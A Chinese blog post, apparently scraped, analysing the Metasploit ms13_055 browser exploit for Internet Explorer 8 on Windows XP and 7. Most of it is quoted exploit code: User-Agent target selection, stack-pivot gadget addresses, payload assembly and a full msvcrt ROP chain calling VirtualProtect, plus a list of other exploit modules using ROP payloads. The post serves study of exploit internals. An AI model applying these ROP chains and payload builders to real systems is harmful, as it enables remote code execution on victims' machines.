ms13_055 metasploit

111   def get_payload(t)
112     if t[‘Rop‘] == :msvcrt
113       print_status("Using msvcrt ROP")
114       esp_align = "\x81\xc4\x54\xf2\xff\xff"
115       rop_dll = ‘msvcrt‘
116       opts    = {‘target‘=>‘xp‘}
117     else
118       print_status("Using JRE ROP")
119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120       rop_dll = ‘java‘
121       opts    = {}
122     end

  

daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254

  

daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF            	sub	esp, 0xFFFFD8F0

  

esp_align代表的汇编语句的作用是对齐esp,即栈指针。


 

 87   def get_target(agent)
 88     return target if target.name != ‘Automatic‘
 89 
 90     nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ‘‘
 91     ie = agent.scan(/MSIE (\d)/).flatten[0] || ‘‘
 92 
 93     ie_name = "IE #{ie}"
 94 
 95     case nt
 96     when ‘5.1‘
 97       os_name = ‘Windows XP SP3‘
 98     when ‘6.1‘
 99       os_name = ‘Windows 7‘
100     end
101 
102     targets.each do |t|
103       if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
104         return t
105       end
106     end
107 
108     nil
109   end

  

188   def on_request_uri(cli, request)
189     agent = request.headers[‘User-Agent‘]
190     t = get_target(agent)

  

当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来

返回与版本相关的数据

 52       ‘Targets‘        =>
 53         [
 54           [ ‘Automatic‘, {} ],
 55           [
 56             ‘IE 8 on Windows XP SP3‘,
 57             {
 58               ‘Rop‘   => :msvcrt,
 59               ‘Pivot‘ => 0x77c15ed5, # xchg eax, esp; ret
 60               ‘Align‘ => 0x77c4d801  # add esp, 0x2c; ret
 61             }
 62           ],
 63           [
 64             ‘IE 8 on Windows 7‘,
 65             {
 66               ‘Rop‘   => :jre,
 67               ‘Pivot‘ => 0x7c348b05, # xchg eax, esp; ret
 68               ‘Align‘ => 0x7C3445F8  # add esp, 0x2c; ret
 69             }
 70           ]
 71         ],

  

如果当前的系统不支持,就会返回404页面。


 

111   def get_payload(t)
112     if t[‘Rop‘] == :msvcrt
113       print_status("Using msvcrt ROP")
114       esp_align = "\x81\xc4\x54\xf2\xff\xff"
115       rop_dll = ‘msvcrt‘
116       opts    = {‘target‘=>‘xp‘}
117     else
118       print_status("Using JRE ROP")
119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120       rop_dll = ‘java‘
121       opts    = {}
122     end
123 
124     p = esp_align + payload.encoded + rand_text_alpha(12000)
125     generate_rop_payload(rop_dll, p, opts)
126   end

  

generate_rop_payload

 77   def generate_rop_payload(rop, payload, opts={})
 78     nop      = opts[‘nop‘]      || nil
 79     badchars = opts[‘badchars‘] || ‘‘
 80     pivot    = opts[‘pivot‘]    || ‘‘
 81     target   = opts[‘target‘]   || ‘‘
 82     base     = opts[‘base‘]     || nil
 83 
 84     rop = select_rop(rop, {‘target‘=>target, ‘base‘=>base})
 85     # Replace the reserved words with actual gadgets
 86     rop = rop.map {|e|
 87       if e == :nop
 88         sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
 89       elsif e == :junk
 90         Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
 91       elsif e == :size
 92         payload.length
 93       elsif e == :unsafe_negate_size
 94         get_unsafe_size(payload.length)
 95       elsif e == :safe_negate_size
 96         get_safe_size(payload.length)
 97       else
 98         e
 99       end
100     }.pack("V*")
101 
102     raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
103 
104     return pivot + rop + payload
105   end

  

会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。

  3 <rop>
  4         <compatibility>
  5                 <target>WINDOWS XP SP2</target>
  6                 <target>WINDOWS XP SP3</target>
  7         </compatibility>
  8 
  9         <gadgets base="0x77c10000">
 10                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
 11                 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
 12                 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
 13                 <gadget value="junk">JUNK</gadget>
 14                 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
 15                 <gadget offset="0x0004d9bb">Writable location</gadget>
 16                 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
 17                 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
 18                 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
 19                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 20                 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
 21                 <gadget value="junk">JUNK</gadget>
 22                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 23                 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 24                 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
 25                 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 26                 <gadget offset="0x0004d9bb">Writable location</gadget>
 27                 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
 28                 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
 29                 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
 30                 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
 31                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
 32                 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
 33                 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
 34                 <gadget offset="0x00025459">ptr to ‘push esp #  ret</gadget>
 35         </gadgets>
 36 </rop>

  


 

在查找Windows下Browser相关的ROP漏洞

daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {‘target‘=>rop_target})
adobe_flash_otf_font.rb:100:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.257‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:110:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.265‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:120:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.268‘, ‘pivot‘=>pivot})
adobe_flash_otf_font.rb:130:      p = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})
adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload(‘java‘, payload.encoded)
adobe_flash_rtmp.rb:135:    code << generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})
adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘10‘ }))
adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘11‘ }))
aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘})
apple_quicktime_mime_type.rb:153:      code = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})
apple_quicktime_rdrf.rb:65:    p = generate_rop_payload(‘msvcrt‘, alignment + payload.encoded, {‘target‘=>‘xp‘})
crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘ => [t[‘Pivot‘]].pack("V")})
hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})
ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘xp‘})
ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘2003‘})
ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload(‘java‘, java_align + code)
ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘xp‘})
ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘2003‘})
ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload(‘java‘, code)
ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2007‘ })
ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2010‘ })
indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload(‘msvcrt‘, code,  {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})#{‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})
mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})
mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})
ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})
ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload(‘java‘, p)
ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload(‘java‘, p)
ms11_081_option.rb:137:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})
ms11_081_option.rb:144:      rop_payload = generate_rop_payload(‘java‘, ‘‘)
ms12_004_midi.rb:519:    generate_rop_payload(‘msvcrt‘, p, {‘pivot‘=>padding, ‘target‘=>‘xp‘})
ms12_037_same_id.rb:133:      rop = generate_rop_payload(‘msvcrt‘, ‘‘, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})
ms12_037_same_id.rb:137:      rop = generate_rop_payload(‘java‘, ‘‘, {‘pivot‘=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})
ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})
ms13_069_caret.rb:97:    p << generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})
ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2007‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})
ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})
ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘, ‘pivot‘ => stack_pivot})
ms14_012_textrange.rb:85:    p = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>setup})
msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload(‘msvcrt‘,‘‘,{‘target‘=>‘xp‘, ‘pivot‘=>adjust})
msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload(‘java‘,‘‘,{‘pivot‘=>adjust})
novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload(‘msvcrt‘, ‘‘, ‘target‘=>‘xp‘) # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload(‘java‘, ‘‘) # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})
ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload(‘java‘, code)
quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload(‘msvcrt‘, payload.encoded, {‘pivot‘=> fake_memory, ‘target‘=>‘xp‘})
vlc_amv.rb:143:      code = generate_rop_payload(‘java‘, payload.encoded)

  

 

ms13_055 metasploit,布布扣,bubuko.com

ms13_055 metasploit

上一篇:jQuery实现点击单选按钮切换选中状态效果


下一篇:iOS程序的启动图片图标规范